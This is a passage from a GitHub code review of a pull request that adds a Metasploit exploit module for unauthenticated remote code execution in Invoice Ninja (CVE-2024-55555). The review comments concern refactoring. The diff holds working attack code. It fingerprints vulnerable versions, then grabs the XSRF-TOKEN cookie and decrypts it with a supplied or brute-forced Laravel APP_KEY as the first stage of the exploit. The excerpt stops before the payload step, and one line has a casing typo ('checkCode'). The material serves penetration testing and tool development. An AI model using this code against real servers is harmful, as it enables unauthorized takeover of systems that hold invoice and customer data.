modules/exploits/linux/http/invoiceninja_unauth_rce_cve_2024_55555.rb

```diff
@@ -0,0 +1,169 @@
+      'ctype' => 'application/x-www-form-urlencoded'
+    })
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res&.code == 200
+
+    # check if target is running the Invoice Ninja platform
+    # search for the Invoice Ninja X-APP-VERSION within the returned headers from the login page
+    version_number = res.headers['X-APP-VERSION']
+    return CheckCode::Safe('No Invoice Ninja platform found.') if version_number.nil?
+
+    if Rex::Version.new(version_number) >= Rex::Version.new('5.8.22') && Rex::Version.new(version_number) <= Rex::Version.new('5.10.10')
+      return CheckCode::Appears("Invoice Ninja #{version_number}")
+    end
+
+    checkCode::Safe("Invoice Ninja #{version_number}")
+  end
+
+  def exploit
+    # lets first check if decryption is successful with the APP_KEY by decrypting the XSRF_TOKEN inside the cookie.
+    # option APP_KEY is either a single entry of a file with APP_KEYS using the [file:] identifier
+    cipher_mode = 'AES-256-CBC'
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    })
+    fail_with(Failure::Unknown, 'No valid response received from target.') unless res&.code == 200
+
+    print_status('Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.')
+    print_status('Grabbing the cookie with the XSRF-TOKEN.')
+    set_cookie = res.get_cookies
+    fail_with(Failure::NotFound, 'No cookie found.') if set_cookie.nil?
+    xsrf_token = set_cookie.match(/XSRF-TOKEN=([^;]+)/)
+    if xsrf_token.nil?
+      fail_with(Failure::NotFound, 'No XSRF-TOKEN found. Unable to check APP_KEY.')
+    elsif datastore['BRUTEFORCE']
+      key_file = datastore['BRUTEFORCE']
+      print_status("Starting bruteforce decryption with APP_KEYS listed in #{key_file}.")
+      result = laravel_bruteforce_from_file(xsrf_token[1], key_file, cipher_mode)
+      if result.nil?
+        fail_with(Failure::NotFound, "Bruteforce decryption failed. No valid APP_KEY found in file #{key_file}.")
+      else
+        print_good("Valid APP_KEY found: #{result['key']}")
+        print_good("Unciphered value: #{result['value']}")
+        valid_app_key = result['key']
+      end
+    else
+      result = laravel_decrypt(xsrf_token[1], datastore['APP_KEY'], cipher_mode)
+      if result.nil?
+        fail_with(Failure::BadConfig, "Decryption with APP_KEY: #{datastore['APP_KEY']} failed.")
+      else
+        print_good("APP_KEY is valid: #{datastore['APP_KEY']}")
+        print_good("Unciphered value: #{result}")
+        valid_app_key = datastore['APP_KEY']
+      end
```

Comment:
This code is too similar to not be factorized I think :P

Reply:
Let me have a look how to optimize.

Reply:
see https://github.com/rapid7/metasploit-framework/pull/19897/commits/41e690445e0db1bb536754f8cd308ee9281ab9ca.